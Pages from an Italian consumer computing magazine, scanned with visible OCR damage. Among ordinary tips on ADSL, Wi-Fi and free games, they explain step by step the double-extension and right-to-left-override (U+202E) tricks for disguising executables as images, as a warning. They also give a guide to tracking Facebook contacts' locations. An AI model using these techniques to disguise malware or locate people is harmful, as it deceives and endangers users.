destinatario. Per renderlo nuovamente leggibile il destinatario utilizzer la chiave privata, di
cui solo lui a conoscenza.
IN CIFRE
t -F DIJBWJ TJDVSF EFWPOP FTTFSF DPNQPTUF EB BMNFOP 0550 $"3"55&3* DPNQSFOTJWJ EJ MFUUFSF NBJVTDPMF
e minuscole, cifre e caratteri particolari;
t -B DPOOFTTJPOF NPCJMF 8-"/ 81" TGSVUUB MP TUBOEBSE EJ DSJQUB[JPOF "&4
32 Win Magazine Speciali

PUNTI DEBOLI
DEL SISTEMA
La criptazione AES a prova di bomba, ma il punto debole
di questo sistema riguarda la a password. Che cosa accade
quando viene smarrita? Come possibile conservarla in
modo sicuro, al cento per cento, senza essere costretti a
criptarla di nuovo?Va da s che le password importanti
possono essere conservate nel migliore dei modi
riponendole scritte su un pezzo di carta, nella
buona, vecchia cassaforte oppure nella
cassetta di sicurezza di una
banca.

Cos fa lhacker

| Una risposta a tutto |

Geolocalizza i tuoi amici!


Esiste un modo per scoprire da dove mi sta scrivendo
un mio contatto sul social network?
Qual la procedura per disattivare la localizzazione
degli utenti su Facebook?
SERVE A CHI
... desidera determinare la posizione
geografica esatta dei propri contatti
su Facebook
on 800 milioni di utenti unici al mese e 72
milioni di contenuti condivisi ogni giorno
Facebook il social network numero uno al
mondo. Basti pensare che ad esso iscritto
quasi il 50% della popolazione mondiale. Dal
2004, anno della sua fondazione, ne stata
fatta di strada e sono stati introdotti numerosi
aggiornamenti e restyling. Uno di questi riguarda proprio lintroduzione dellapp Facebook
Messenger che ha di fatto separato il servizio
di messaggistica immediata dallo stesso social
network, obbligando gli utenti a installare lapplicazione sui propri smartphone. Facebook
Messenger permette infatti di raggiungere

istantaneamente le persone che conosciamo


inviando loro messaggi, proprio come se stessimo spedendo un SMS ma in maniera del tutto
gratuita. Inoltre ci consente di condividere
con gli amici sui telefonini immagini e video in
maniera semplice e veloce. Tra le funzioni pi
interessanti introdotte proprio con Messenger
c poi la possibilit di effettuare chiamate con
i nostri amici di Facebook utilizzando una connessione dati, molto utile specialmente se ci
troviamo allestero e abbiamo a disposizione
una connessione Wi-Fi.

Dove sono i miei amici?


Una delle impostazioni di Messenger e di Facebook stesso riguarda la condivisione della
nostra posizione con gli altri utenti nel momento in cui utilizziamo un servizio collegato
al nostro account. Facebook incoraggia ad
utilizzare questa funzione tanto che di default
sempre attiva su tutti i nostri account. Ci ci

permette, tramite una piccola estensione per


il browser, di vedere gli spostamenti dei nostri
amici e capire il posto esatto dal quale ci stanno
scrivendo. Questa estensione, naturalmente,
non va a leggere dati privati degli utenti ma,
semplicemente, estrapola la posizione tramite
i dati messi a disposizione proprio da Facebook
tramite lattivazione di questa funzione nel proprio profilo. Vediamo insieme come installare e
utilizzare questa estensione su Google Chrome.

STOP ALLA LOCALIZZAZIONE SU FACEBOOK


Come abbiamo visto, se il servizio di posizione di Messenger attivo tutti possono riuscire a vedere la nostra posizione tramite un semplice plug-in. Come facciamo quindi
a disattivare questa opzione? Apriamo lapplicazione
di Facebook sul nostro smartphone e, allinterno delle
Impostazioni, selezioniamo Impostazioni Applicazione.
Ora andiamo su Servizi sulla posizione di Messenger e
verifichiamo che la localizzazione sia deselezionata. Se il
servizio attivo togliamo il segno di spunta dal Location
is on in modo da disattivare in modo definitivo la nostra
posizione.

Cos individuiamo la posizione geografica di un contatto Facebook

Apriamo con Google Chrome e visitiamo il


Web Store raggiungendo lindirizzo www.
winmagazine.it/link/3155. Cerchiamo Marauders Map einstalliamolestensionecliccandosul
tastoAGGIUNGI.Terminatalinstallazione,siamo
pronti ad utilizzare la nostra nuova estensione.

A questo punto apriamo la pagina dei Messaggi di Facebook allindirizzo Internet


https://www.facebook.com/messages ed effettuiamo il login utilizzando il nostro account.
Fatto, ci, procediamo selezionando una delle
chat sulla sinistra.

In basso a sinistra nella pagina apparir un


piccolo pop-up individuato dalla scritta
Marauders Map. Sar sufficiente fare clic su
di esso per aprire la mappa che automaticamente indicher la posizione del nostro contatto Facebook.
Speciali Win Magazine 33

| Virus: basta un doppio clic! |

Ti infetto il PC
con un clic!
Centro sicurezza
Win Magazine

l modo pi semplice per infettare il proprio computer quello di mandare in


esecuzione un file contenente al proprio interno il codice di un virus o di uno
spyware. Un doppio clic di troppo sul file
sbagliato pu infatti scatenare linferno nel
nostro PC con conseguenze che, in taluni
casi, possono essere anche abbastanza
gravi, come la cancellazione definitiva di
documenti importanti presenti sul disco
rigido, il furto di password e dati personali
e via dicendo.

Di default Windows non visualizza le


estensioni dei file noti. Cos i creatori di
malware ne approfittano per infettare i PC
Attenti allestensione dei
file salvati su disco
Per individuare la tipologia di un file tipicamente basta osservarne lestensione,
ovvero il suffisso costituito da una breve
sequenza di caratteri (generalmente tre)
che ne segue il nome ed separato da
questultimo da un punto. Lestensione
del file indica al sistema operativo di che
tipo di file si tratta e con quale programma
associato deve aprirlo. Ad esempio prova.
jpg unimmagine digitale perch lesten-

sione JPG indica appunto che appartiene


a questa categoria di file e, cliccandoci
due volte sopra, Windows la apre col visualizzatore predefinito. Quelli invece che
hanno estensione .com o .exe (ad esempio
setup.exe) sono veri e propri eseguibili. La
maggior parte di essi non contiene virus,
ma quando li scarichiamo dai siti Internet o li riceviamo come allegati ai nostri
messaggi di posta elettronica dobbiamo
stare molto attenti a non fare doppio clic
su di essi, in particolare se sono di origine
sconosciuta oppure se il mittente non ci ha
preventivamente informato del loro contenuto. Se il PC di un nostro amico stato
infettato, infatti, il nostro indirizzo e-mail
stato inserito nella sua rubrica, potremmo
ricevere a sua insaputa un messaggio di
posta con in allegato un eseguibile che
in realt un virus. Per questo motivo
quando riceviamo come allegati dei file
di questo genere opportuno eliminare
direttamente le-mail oppure, in extremis,
salvarli in una cartella a parte su hard
disk ed effettuarne una scansione con un
antivirus aggiornato prima di eseguirli
(in alternativa possiamo effettuare una
scansione on-line con il pratico servizio
VirusTotal).

Il trucco per infettare


il PC c, ma non si vede

Se la visualizzazione delle estensioni disattivata, potremmo ritrovarci sul nostro computer con un file
camuffato da malware.

34 Win Magazine Speciali

Il creatori di virus non sono sicuramente


degli sprovveduti e, puntando sulle abitudini e la disattenzione degli utenti, escogitano sempre nuovi trucchi per riuscire
comunque a infettare i loro PC.
Uno di questi si basa sulla visualizzazione
delle estensioni dei file che di default, al-

Cos fa lhacker

| Virus: basta un doppio clic! |

Attiviamo la visualizzazione delle estensioni dei file

Se la visualizzazione dellestensione dei


file disattivata in Windows, possiamo
visualizzarne solo il nome. Per ovviare a
ci, direttamente in Esplora risorse andiamo nel menu Strumenti e selezioniamo la
voce Opzioni cartella.

meno per quelle pi comuni (come EXE,


MP3, JPG, BMP, AVI e via dicendo), disabilitata in tutte le versioni di Windows.
Approfittando proprio di questa caratteristica degli OS Microsoft, molti malware
riescono a nascondere la loro vera estensione e a far credere allutente di essere
file innocui. Il semplice stratagemma architettato dai malintenzionati consiste
nellutilizzare file con due estensioni in
modo tale che allegati pericolosi vengano
ritenuti sicuri. Il file Traccia1.mp3.exe
verr visualizzato come Traccia1.mp3 e
noi saremo tentati di aprirlo pensando che
si tratti di un file audio. Solo osservando
bene licona visualizzata a sinistra del file
potremmo accorgerci che non si tratta di
un brano musicale, ma di un eseguibile.
Qualora cadessimo nel tranello, Windows tenterebbe di aprire il file basandosi sullestensione che trova allestrema
destra del nome del file: nel nostro caso
il file Traccia1.mp3.exe (visualizzato in
Risorse del computer come Traccia1.mp3)
verrebbe avviato come un eseguibile e non
aperto con un player multimediale come
invece ci aspetteremmo.
Come possiamo evitare di cadere distrattamente nella trappola? Semplice, basta
abilitare la visualizzazione delle estensioni dei file: in tal modo ai nostri occhi
comparir sia lestensione fake del file
sia quella vera e non potremo pi farci
trarre inganno!

Quando compare la scheda Opzioni cartella, andiamo nel tab Visualizzazione e,


nel riquadro Impostazioni avanzate, togliamo il segno di spunta dalla voce Nascondi
le estensioni per i tipi di ile conosciuti. Premiamo Applica, quindi OK.

Una volta fatto ci, potremo immediatamente visualizzare tutti i file con le
loro relative estensioni. Se un allegato ha
unestensione fasulla, adesso riusciremo a
vedere quella vera allestrema destra del
suo nome.

IL TRUCCO DELLESTENSIONE ROVESCIATA


Unaltra tecnica eicace che
gli sviluppatori di virus utilizzano per infettare i computer
quella che si basa sulla visualizzazione in Windows dei testi
in lingue sinistrorse (arabo,
ebraico, ecc), scritte cio andando da destra verso sinistra,
al contrario dellitaliano e delle
altre lingue occidentali che
invece sono destrorse, cio
scritte da sinistra verso destra.
Per gestire le lingue sinistrorse
esiste un carattere speciale nel
sistema Unicode, identiicato
dal codice U+202E (possiamo
trovarlo utilizzando la Mappa
caratteri di Windows), che permette di invertire una stringa
di testo. Si tratta di un simbolo
di formattazione invisibile che
forza la scrittura da destra a
sinistra. In pratica il carattere
U+202E viene usato per ingannare gli utenti sullidentit del
ile, anche quando la visualizzazione delle estensioni dei
file conosciuti stata abilitata. Come fanno? In pratica
vanno nel menu Start/Esegui,
digitano charmap e premo-

no Invio. Aperta la Mappa


caratteri, individuano il carattere U+202E e lo copiano
negli appunti premendo prima Seleziona e poi Copia. A
questo punto prendono gli
sviluppatori prendono leseguibile del loro malware e lo
rinominano, ad esempio Foto
in spiaggia gpj.exe. Fatto ci
posizionano il cursore appena

prima di gpj.exe e, utilizzando


la combinazione di tasti Control + V incollano il carattere
U+202E memorizzato negli
appunti. In un batter docchio
il nome del ile diventer Foto
in spiaggia exe.jpg, facendo
credere allutente che si tratta
di unimmagine digitale mentre uneseguibile. Teniamo
pertanto gli occhi ben aperti!

Speciali Win Magazine 35

Cos fa lhacker

| Fai da te | Metti il turbo a Internet |

Cosa ci
occorre
CFOSSPEED

Ecco come conigurare e ottimizzare lADSL di casa


per sfrecciare su Internet

sempre pi urgente a causa del collega che


tiene eMule acceso sul suo portatile per tutto
il giorno o di quello che ha la mania di fare
frequenti backup sul cloud.

Perch Internet rallenta?


Una delle cause principali della latenza di
trasmissione della propria connessione
determinata dalla saturazione della banda
di upload alla quale le configurazioni tradizionali di router e PC non pongono soluzioni.
Alcuni pensano che il principale responsabile
del rallentamento della linea quando operiamo un upload importante sia un limite

DIFFICILE

ACCELERATORE
INTERNET

a tutto gas
a quando Internet entrata nelle case
di tutti con un crescente fabbisogno
di larghezza di banda da parte di applicazioni Web e giochi, le problematiche
legate alla latenza della connessione si sono
moltiplicate. Quanti di noi si sono ritrovati
a non riuscire a navigare quando in corso
il caricamento di un video su YouTube? E
quanti lamentano di non riuscire a giocare
con il loro multiplayer preferito mentre un
altro utente della rete domestica sincronizza
i suoi file con Dropbox? Sicuramente in molti,
e anche negli ambienti lavorativi il problema della disponibilit di banda diventato

30 MIN.

Lo trovi su: DVD


Quanto costa: 15,90
Sito Internet:
www.cfos.de
Note: La versione di
cFosSpeed che trovi
sul CD/DVD completa
per 30 giorni.

intrinseco alla tecnologia dellADSL, ma la


realt unaltra. Il rallentamento se non il
blocco totale dei dati in ingresso durante un
caricamento in uscita infatti responsabilit del protocollo TCP/IP e, nello specifico,
dellimpossibilit da parte di questultimo
di inviare correttamente al server remoto
il pacchetto ACK (Acknowledge), una sorta di conferma di avvenuta ricezione che
consente a questultimo di proseguire con
linvio dei pacchetti successivi. In altre parole, anche se siamo abituati a considerare
lo scaricamento di un file come qualcosa che
occupa solo la banda di download, in realt

Il tool che sblocca lADSL


Scopriamo assieme la procedura corretta da seguire per installare e conigurare cFosSpeed. Potremo cos
attivare immediatamente il controllo sulla latenza di banda della nostra connessione a Internet.

Software pronto alluso

Abbassiamo la latenza

Nella sezione Internet del Win CD/DVD


presente larchivio cFosSpeed.zip: scompattiamolo in una qualsiasi cartella dellhard disk, ad
esempio il Desktop, ed eseguiamo il ile EXE contenuto al suo interno. Installiamo quindi il software
mantenendo i dati richiesti sui loro valori standard.

Al termine clicchiamo due volte sullicona


di cFosSpeed nella system tray di Windows.
Nella piccola inestra che si apre, clicchiamo sullicona centrale facendo in modo che rafiguri una freccia
verso lalto: si tratta della modalit a bassa latenza
che d priorit al tempo di ping.

36 Win Magazine Speciali

Chi occupa la banda?

Clicchiamo sullicona a sinistra della freccia.


Si aprir una inestra del browser con lelenco delle connessioni in atto: aumentiamo (cliccando
+) o diminuiamo (cliccando -) la priorit da destinare ad ogni singola connessione agevolando ulteriormente lottimizzazione della connessione.

Cos fa lhacker

| Metti il turbo a Internet | Fai da te |

LA PICCOLA E POTENTE INTERFACCIA DI CFOSSPEED


Il programma semplicissimo da utilizzare: utilizzando correttamente i suoi potenti strumenti possiamo
ottimizzare e velocizzare la connessione a Internet in pochi clic.
LAUNCH ICON
Cliccando due volte su questa icona
possiamo accedere a tutte le funzioni
del software

BANDA DOWNLOAD
Anche in questo caso, basta unocchiata per
sapere quanta banda stanno occupando, ad
esempio, le applicazioni di ile sharing

MODALIT ALTA LATENZA


Clicchiamo sulla freccia in alto per dare
priorit alla larghezza di banda. Cliccando
sulla freccia in basso, al contrario,
impostiamo una bassa latenza che agevola
il tempo di PING

TEMPO DI PING
Viene espresso in millisecondi: se non
supera i 50 ms vuol dire che la connessione
ADSL funziona correttamente

CONNESSIONI
Permette di accedere ad un menu
contestuale che contiene tutte le
connessioni attive
BANDA UPLOAD
una rappresentazione graica molto
intuitiva che esprime quanta banda in
upload occupata dalle applicazioni in
esecuzione nel sistema

questoperazione richiede dello spazio


anche su quella di upload: una richiesta sicuramente poco esosa, in quanto si tratta di
un semplice scambio di informazioni tra il
client e il server in cui il primo comunica al
secondo OK, puoi proseguire con il resto,
ma pur sempre fondamentale.

Misuriamo la latenza
Il modo migliore per valutare la latenza della

CONNESSIONI CORRENTI
Indica quante connessioni in ingresso e
uscita sono attive in un preciso momento
VELOCIT UPLOAD
Indica la velocit della nostra ADSL nel
trasferimento on-line
VELOCIT DOWNLOAD
Permette di conoscere in tempo reale la
velocit di download delle applicazioni attive
nel sistema

nostra trasmissione verificare il tempo di


ping, un valore che oscilla tra i 15 ms (ottimale) e che nel caso di un intasamento
importante pu anche arrivare a 300 o 400
millisecondi. Ping unutility di rete molto
conosciuta dagli amministratori di server e
usata per misurare il tempo che impiega un
computer per inviare un piccolo pacchetto
dati (32 byte) a un altro computer e poi riceverlo. Naturalmente partiamo dallassunto

BUONI
CONSIGLI
MISURIAMO IL
NOSTRO PING
Per misurare il nostro
tempo di ping interrompiamo ogni download/upload, avviamo
il Prompt dei comandi
(dal menu Start digitiamo cmd e clicchiamo
Prompt dei comandi
nei risultati). Digitiamo
il comando ping www.
winmagazine.it. Se il
valore medio restituito
non superiore ai 50
ms, il fornitore di connettivit ci sta ofrendo
un ottimo servizio.

che il server con cui stiamo effettuando la


misurazione non sia appesantito da carichi di lavoro importanti o particolarmente
distante dalla nostra posizione. In una connessione dove il valore del ping pari a 50 ms
significa che quel pacchetto ha impiegato 50
millisecondi per andare e tornare, un valore
praticamente perfetto per qualsiasi attivit
on-line che richieda risposte veloci come i
giochi multiplayer.

Conigurazione LAN avanzata


Vediamo adesso come attivare differenti priorit di connessione per ogni singolo software o videogioco installato
nel computer: otterremo cos ottimi risultati nelle prestazioni della nostra linea ADSL.

Gestiamo il trafico

Calibriamo la linea ADSL cliccando col tasto


destro sullicona di cFosSpeed e selezionando prima TRAFFIC SHAPING e poi CALIBRAZIONE
DELLA LINEA (interrompiamo qualsiasi tipo di trafico
sulla rete). Il software misurer in 3 minuti la capacit
massima di download e upload della linea.

Diamo priorit ai giochi

Sempre dal menu contestuale di cFosSpeed


selezioniamo ora la voce OPZIONI. Clicchiamo sulla scheda PROGRAMMI a sinistra e poi su
GIOCHI in alto. Scegliamo il titolo (nellimmagine Call
of Duty) col quale giochiamo pi frequentemente e
impostiamo il cursore a destra sulla voce ALTO.

Blocchiamo i mangia banda

Nella stessa schermata clicchiamo sulla


scheda CONDIVISIONE FILE e scegliamo
dallelenco che appare il programma che solitamente responsabile dellintasamento della banda (ad
esempio, Dropbox): assegniamogli una priorit bassa agendo di conseguenza col cursore sulla destra.

Speciali Win Magazine 37

Cos fa lhacker

| Fai da te | Metti il turbo a Internet |

Navighiamo pi veloci!
Terminata la conigurazione di rete, effettuiamo un veloce test della nostra linea ADSL durante una sessione
di upload, attivando e poi disattivando cFosSpeed: le differenze di velocit saranno notevoli!

Effettuiamo un test

Simuliamo un caso reale

Clicchiamo col tasto destro del mouse


sullicona di cFosSpeed e disabilitiamo il
trafing shaping: dal menu contestuale selezioniamo
la voce TRAFFIC SHAPING e clicchiamo su DISABILITA TRAFFING SHAPING. Avviamo quindi il browser
e colleghiamoci al sito www.speedtest.net.

Sfruttiamo tutta la banda


Per risolvere il problema della latenza, quindi, bisogna permettere ai pacchetti ACK di
partire senza problemi anche quando stiamo
caricando un video su YouTube: in pratica
questo significa porre dei limiti alle singole
connessioni che, qualora non previste dal
software (come nel caso di Dropbox), bisogna

Avviamo, ad esempio, la riproduzione di un


video su YouTube oppure carichiamo un
documento su Google Drive. Nella inestra del browser dove abbiamo aperto lo SpeedTest clicchiamo
sul pulsante BEGIN TEST. Prendiamo quindi nota dei
valori di Ping, Download e Upload.

delegare a software specifici che effettuano


unoperazione detta di traffic shaping, letteralmente controllo del traffico. Abbiamo
quindi scovato un software che, oltre a funzionare perfettamente, concorre a divenire
uno standard per lottimizzazione delle connessioni dati in quanto viene adottato anche
da produttori di schede madri del calibro di

La differenza notevole!

Riabilitiamo il Traffic Shaping da cFosSpeed. Veriichiamo che lupload precedente sia ancora in corso e clicchiamo di nuovo BEGIN
TEST in SpeedTest. Il tempo di ping dimezzato,
mentre la banda per il download aumentata, a
testimonianza dellavvenuta ottimizzazione dellADSL!

Asus, Gigabyte, AsRock ed MSI che lo integrano nella dotazione standard dei loro modelli
di punta. Si tratta di cFosSpeed, un software
che, se correttamente configurato, consente
di mettere il turbo alla nostra connessione
ADSL con risultati in termini di taglio dei
tempi di latenza davvero eccezionali. Provare
per credere!

UNA LAN EFFICIENTE CON LA MODALIT COOPERATIVA


Se installiamo CFOS SPEED su tutti i computer della rete potremo ottimizzare la nostra
LAN in un batter docchio. Raggiungendo la
inestra delle opzioni di cFosSpeed (come
sempre, clicchiamo col tasto destro del
mouse sullicona del software nella system
tray di Windows e selezioniamo la voce
Opzioni) clicchiamo sullicona dellingranaggio che fa capo alla scheda di rete che
utilizziamo per la navigazione. Nella inestra
successiva togliamo la spunta alla voce Non
cooperativa e attiviamo invece la voce Net
Talk subito sotto. A seguire, impostiamo la
tipologia di connessione ADSL dal menu
a tendina tipo connessione: per le ADSL
di casa, tipicamente, occorre selezionare
la voce DSL (PPPoE). Cos facendo avremo ottimizzato contemporaneamente la
connessione a Internet su tutti i computer
connessi alla rete di casa. Ricordiamo, per,
38 Win Magazine Speciali

che questo tipo di modalit utile solo se


tutti i computer presenti nella LAN installano cFosSpeed e attivano le impostazioni di
cui sopra: purtroppo baster un solo dispositivo (come un tablet o uno smartphone)

non sottomesso alle regole del software per


vaniicare lo strumento di ottimizzazione
della LAN. In questo caso, occorre riattivare
la modalit Non cooperativa per evitare di
generare ulteriori rallentamenti dellADSL.

BUONI
CONSIGLI
ACCESS POINT
FATTO IN CASA
La versione a pagamento di cFosSpeed permette di usare il PC come
Access Point Wi-Fi (se
presente una scheda
Wi-Fi). Dallapposita voce nel menu possiamo
conigurare lSSID della
rete e deinire una password. I dati del Wi-Fi
passeranno attraverso
cFosSpeed che impedir
ai dispositivi connessi di
saturare la banda. utile se usiamo smartphone, tablet o Smart TV
sui quali non possiamo
installare cFosSpeed.

Cos fa lhacker

| Migliora la velocit del Wi-Fi | Speciale trucchi |

MIGLIORIAMO LA VELOCIT DELLA NOSTRA RETE WI-FI


Con piccole modiiche alla conigurazione del router possibile ottimizzare la connessione wireless per tutti
i dispositivi connessi alla LAN domestica.

PI POTENZA
PER LANTENNA

Alcuni router, soprattutto quelli pi economici, sono dotati di antenne con bassa
efficienza di trasmissione che non riescono
a diffondere correttamente il segnale Wi-Fi.
C per un semplice trucco per risolvere
iil problema.
PProcuriamoci una lattina di alluminio di quelle
ate per le bevande e posizioniamola intorno
allantenna dopo averla tagliata e leggermente aperta
a
lungo lasse verticale. In questo modo eiamo una sorta di amplificatore che permettee di aumentare la potenza del segnale WiFi di rca 1,5 volte. C per una piccola controindicazione da tenere presente i questo caso: il segnale, infatti, viene direzionato esclusivamen e dal lato aperto della lattina, mentre
viene tutito nelle altre direzioni. Poco male se il router posizionato su un lato della
casa e il segnale deve irrorare tutte le altre
stanze. Se abbiamo un router con pi antenne, inoltre, possiamo provare il trucco
applic do la lattina solo ad una di esse
e lasciaando le altre libere di trasmettere
il seg ale Wi-Fi in tutte le direzioni. In
alternativa, possiamo acquistare su Internet unantenna
potenziata come la TP-LINK

IN BREVE
ATTENTI
AL FILE
SHARING

Ci sono programmi che se mal


configurati potrebbero intasare
la connessione.
questo il caso, soprattutto, dei download manager e dei
client P2P come
eMule e JDownloader. Non a caso, tutti questi programmi permettono di configurare loccupazione di
banda lasciando
allutente la possibilit di scegliere se
scaricare a mille o
bilanciare la velocit di download con
quella di navigazione su Internet.

TL-ANT2408CL da sostituire a quelle fornite in


dotazione con il router.

SFRUTTIAMO TUTTI
I CANALI

I router utilizzando le normali onde radio


per trasmettere il segnale Wi-Fi su frequenze di 2,4 GHz. Il problema che vicino
casa nostra potrebbero esserci numerosi
dispositivi che trasmettono su queste frequenze generando notevoli interferenze.
La soluzione cambiare il canale di trasmissione.
La maggior parte dei router in commercio utilizzano la frequenza di trasmissione a 2,4 GHZ
e trasmettono solo 3 canali non sovrapposti,
tra i 14 disponibili per le comunicazioni wireless. Ci significa che se la zona in cui abitiamo
affollata di reti Wi-Fi avremo un traffico notevole su questi 3 canali. Addirittura, anche un
forno a microonde o un telefono cordless posizionati vicino al router potrebbero creare notevoli interferenze. Ecco perch nella scelta del
router Wi-Fi da acquistare opportuno optare
per un modello con doppio canale di comunicazione: il classico a 2,4 GHz e il pi potente a
5 GHz. Questi router hanno un software di gestione che permette di scegliere in automatico

la frequenza migliore da utilizzare per evitare interferenze e garantire sempre il miglior sfruttamento della banda Wi-Fi.

RIPETIAMO
IL SEGNALE

Se abitiamo in una casa molto grande o


con lunghi corridoi e muri spessi, possiamo
risolvere il problema dellattenuazione
del segnale Wi-Fi semplicemente amplificandolo!
In pratica, si tratta di acquistare un ripetitore
wireless da collegare ad una presa di corrente elettrica posizionata a met strada tra il router (da cui riceve il segnale) e i dispositivi Wi-Fi
da connettere alla rete domestica (ai quali diffonde il segnale). Il FRITZ!WLAN Repeater 310,
ad esempio, estende in modo semplice e sicuro
la portata della rete wireless a dispositivi quali smartphone e tablet anche se si trovano nei
punti pi lontani. Piccolo come un biglietto da
visita, si pu usare praticamente con ogni presa della casa (www.winmagazine.it/link/3136).

Quanto potente la tua WLAN?


Prima di scegliere la terapia occorre formulare la diagnosi, che dovr accertare il punto debole della rete wireless.
Per farlo bastano un notebook e il tool HeatMapper (scaricabile da Win Extra). Ecco come procedere.

La pianta dellappartamento

Disponendo della piantina dellappartamento sar molto pi facile stabilire una diagnosi. Se abbiamo solo una stampa, effettuiamone una
scansione e salviamo limmagine in formato JPEG.
In caso contrario, baster anche uno schizzo e potremo orientarci con la griglia fornita dal programma.

Siamo subito operativi

Installiamo il software su un notebook e attiviamo la connessione alla rete wireless. Scegliamo se lavorare su una piantina (I have a map
image) o con la griglia inclusa nel programma (I
dont have a map image). Fissiamo con un clic la
nostra posizione, contrassegnata da un punto verde.

Analizziamo la rete

Spostiamoci per lappartamento e issiamo


altre posizioni. Clicchiamo col tasto destro
sullimmagine a video: HeatMapper visualizzer la
rete WLAN. Le superici di colore verde indicano buona ricezione, quelle di colore arancione/rosso evidenzieranno invece una cattiva connessione.

Speciali Win Magazine 39

Cos fa lhacker

| Software | Origin |

Giochi sul PC
a costo zero
C' un modo per divertirsi con i
videogiochi pi hot del momento
senza sborsare un centesimo
Cosa ci
occorre

15 MIN.
FACILE

PIATTAFORMA DI
DISTRIBUZIONE
DIGITALE

ORIGIN
Lo trovi su: DVD
SOFTWARE COMPLETO
Sito Internet:
www.origin.com

BUONI
CONSIGLI
GIOCHI COMPLETI,
MA A TEMPO
Origin ci d anche la
possibilit di provare
dei giochi per un
periodo di tempo limitato durante il quale
i progressi vengono
salvati. Se, successivamente, decideremo
di acquistare il gioco,
potremo riprendere la
partita dal punto in cui
labbiamo interrotta.
Per visualizzare questa
categoria di giochi e
installarli clicchiamo su
GIOCHI GRATUITI/Game
Time, quindi clicchiamo
sul pulsante Scarica Ora
accanto al gioco che
vogliamo provare.

assare un po di tempo a giocare col


computer sempre un piacere, ma
lo ancora di pi se lo possiamo fare
senza dover mettere mano al portafoglio.
Ma dove possiamo trovare un videogioco a
costo zero? La soluzione, del tutto legale,
portata di clic! Pu fare infatti sicuramente
al caso nostro Origin, un software di Electronic Arts che, una volta effettuata una
semplice registrazione on-line, ci consente
di scaricare e installare i giochi completi
offerti gratuitamente. Inoltre, avviando il
gioco dalla piattaforma Origin possiamo
salvare i dati del gioco direttamente nel
cloud e continuare le nostre partite anche
da altri PC su cui presente il programma.
Ricordiamoci di tenere docchio il programma: nuovi divertenti giochi a costo
zero vengono rilasciati periodicamente!

Creiamo un account EA
Creia
Apriamo il nostro browser Internet, raggiungiamo il sito www.origin.com e facciamo
clic in alto sulla voce Registrati. Nella inestra che si apre digitiamo nellapposito box il nostro
indirizzo di posta elettronica e proseguiamo premendo il pulsante Avanti.

Cos fa lhacker

| Origin | Software |

BUONI
CONSIGLI
DOVE SONO I
NOSTRI GIOCHI?

Co pletiamo
p
la re istrazione

O a tocca
to
a Ori in

Visualizzeremo adesso un modulo: scegliamo un ID pubblico (il nostro nickname) e una password per laccount,
compiliamo quindi tutti i campi richiesti e facciamo clic
Avanti. Ci verranno chiesti nome e cognome, che per sono
opzionali: premiamo il tasto Salta.

Creato laccount, premiamo Continua. Nellhome page


clicchiamo Scarica Origin, poi su Download Origin for
PC, quindi salviamo il ile di setup su disco. Completato
il download, facciamo doppio clic sul ile OriginThinSetup.exe,
premiamo Installa e seguiamo la procedura guidata.

Una volta installati i


giochi possiamo farli
partire direttamente
dallinterfaccia di Origin
cliccando sulla voce
in alto I MIEI GIOCHI.
Troveremo cos elencati
i titoli che abbiamo gi
installato. Passando il
mouse su uno dei giochi
comparir una piccola
inestra: facciamo clic su
Gioca per avviare il gioco oppure sul pulsante
i per visualizzare informazioni su di esso o disinstallarlo (in tal caso
andiamo nella scheda
Dettagli e clicchiamo su
Disinstalla).

SALVATAGGI
ON-LINE

seguiamo
seg
ggu
laccesso

Co guriamo
g
la privac

Facciamo doppio clic sullicona di Origin che troviamo in


basso sulla system tray e quando compare linterfaccia
inseriamo lID (o lindirizzo di posta elettronica con il quale
ci siamo registrati) e la password. Premiamo quindi il pulsante
Accedi.

Nella schermata successiva possiamo impostare la nostra


privacy. Se non vogliamo essere contattati da altri utenti
Origin scegliamo Nessuno dal menu a tendina Chi pu
visualizzare il mio proilo e togliamo il segno di spunta da tutte
le voci. Proseguiamo con Continua.

Scarichiamo un titolo ratuito


Scar

Pronti a iocare!
Pron

Nella schermata che ci chiede nome e cognome premiamo Salta. Quando si apre linterfaccia del software clicchiamo sul menu GIOCHI GRATUITI e poi su Offre la ditta.
Scorriamo la pagina inch non compare il box Gioco attualmente
gratuito. Clicchiamo su Scarica Ora.

Scegliamo la lingua disponibile e clicchiamo Accetta.


Lasciamo invariate le opzioni di default e premiamo Continua. Spuntiamo Ho letto e accetto gli accordi di licenza
di cui sopra e clicchiamo Continua. Terminato il download, verr
installato il gioco. Al termine premiamo Gioca.

Origin dispone della


funzionalit del salvataggio cloud dei dati del
gioco che consente di
accedere e continuare a
giocare da qualsiasi PC
sul quale installato il
programma. Per assicurarci che tale funzione
sia attiva, avviamo
Origin, efettuiamo
laccesso, andiamo
nel menu Origin/
Impostazioni applicazione e nella scheda
Generale assicuriamoci
che sia spuntata Attiva
memorizzazione su
cloud per tutti i giochi
supportati. In questo
modo i dati di salvataggio del gioco saranno
sempre sincronizzati
col cloud. Per sapere
invece quanto spazio
cloud sta utilizzando un
gioco, dallinterfaccia
principale clicchiamo su
I MIEI GIOCHI, passiamo
il mouse sul titolo di
nostro interesse, clicchiamo sul pulsante i,
andiamo nella scheda
Cloud storage (se la
scheda non c, vuol
dire che il gioco non
supporta il salvataggio
cloud) e controlliamo
lindicatore Utilizzo di
cloud storage.

Speciali Win Magazine 41

Cos fa lhacker

ne di pi | Console di gioco: upgrade sblocca-tutto |

Console: upgrade
sblocca-tutto
Cos i pirati aggiornano le Xbox modiicate
per continuare a giocare gratis con i nuovi
titoli e divertirsi con la Kinect
nascita e levo
one delle console di
gioco sono fenom n i tipici degli ultimi
storia e queste macine lle meraviglie r ppresentano oggi il
40% dellintero mercato videoludico. Questo
porta le grandi case pro
oduttrici di console,
come Microsoft e Son , a puntare molto su
questosettore, oponendo agli utenti
hardware empre pi potenti in
gradodirriprodurre esperienze
di gioco
o realistiche e al passo
con le produzioni delle softwa house di videogiochi.
a delle pi grandi spine
nel ianco per le aziende
pr duttrici di console
r lo sviluppo, da parte di esperti hacker, di
m

ATTENZIONE!
Al momento, in Italia non c un preciso orientamento legislativo in merito alla modiica delle console di gioco. Le nostr
corti di giustizia considerano lapplicazione dei cosiddett
modchip e, pi in generale, le modiiche per le console d
gioco come illecite per viola
azione
i
d
dellart.
ll t 171
171-ter
t d
della
ll
nostra legge sul diritto dau
utore. Molte sono invece
le posizioni dottrinali opposte, le quali valutano i
modchip come importanti strumenti per garantire
interoperabilit e incentiva
are gli sviluppatori indipendenti. opportuno com
munque precisare che Win Magazine non si schiera
ovviamente a favore della pirateria: le
procedure mostrate nellarticcolonon
blicate
vengono volutamente pubb
in maniera dettagliata per non
consentire di mettere in pratica
la modiica della console.
42 Win Magazine Speciali

